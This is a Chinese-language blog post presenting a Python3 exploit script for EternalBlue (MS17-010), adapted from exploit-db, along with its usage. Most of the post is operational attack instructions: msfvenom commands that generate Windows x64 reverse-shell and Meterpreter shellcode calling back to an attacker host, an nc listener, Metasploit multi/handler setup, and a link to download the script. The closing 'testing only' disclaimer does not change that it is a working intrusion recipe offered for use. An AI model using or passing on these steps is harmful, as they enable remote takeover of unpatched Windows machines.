0x00 前言
前段时间Equation Group泄露Eternalblue(MS17-010)的利用工具,搭建环境比较麻烦,借助exploit-db上的exp优化修改了一个纯python3的利用脚本。
0x01 使用简介
1.直接运行python3 ./ms17-010.py,提示使用方法及以x64为例的shellcode生成命令(亲测直接用Dll文件会蓝屏)1
2
3
4
5
6
7Usage: python3 ./ms17-010.py --host xxx --file xxx --port xxx
[!] You can make a nc reverse shell USER_SHELLCODE_FILE in kali2.0 by use :
"msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxx -f raw > shellcode"
[!] You can make a meterpreter reverse shell USER_SHELLCODE_FILE in kali2.0 by use :
"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f raw > shellcode"
2.直接运行python3 ./ms17-010.py -h提示参数的含义(除非getshell以后的特殊提权利用以外,通常不需要修改端口号)1
2
3
4
5
6
7
8
9usage: ms17-010.py [-h] [--host HOST] [--port PORT] [--file FILE]
Process some integers.
optional arguments:
-h, --help show this help message and exit
--host HOST, -H HOST Host ip
--port PORT, -p PORT Target port,defalut:445
--file FILE, -f FILE User shellcode file
3.利用反弹shellcode需要在反弹主机上监听对应端口
3.1 nc:1
nc -lvp 8888
3.2 meterpreter:1
2
3
4
5msfconsole
use exploit/multi/handler
set windows/x64/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport xxx
0x02 源码
http://blackwolfsec.cc/static/code/ms17-010.py
提示:
本博客里任何文章/动画/教程以及各类软件/工具等仅供个人测试研究,请在下载后24小时内删除,不得用于商业或非法用途,否则后果自负。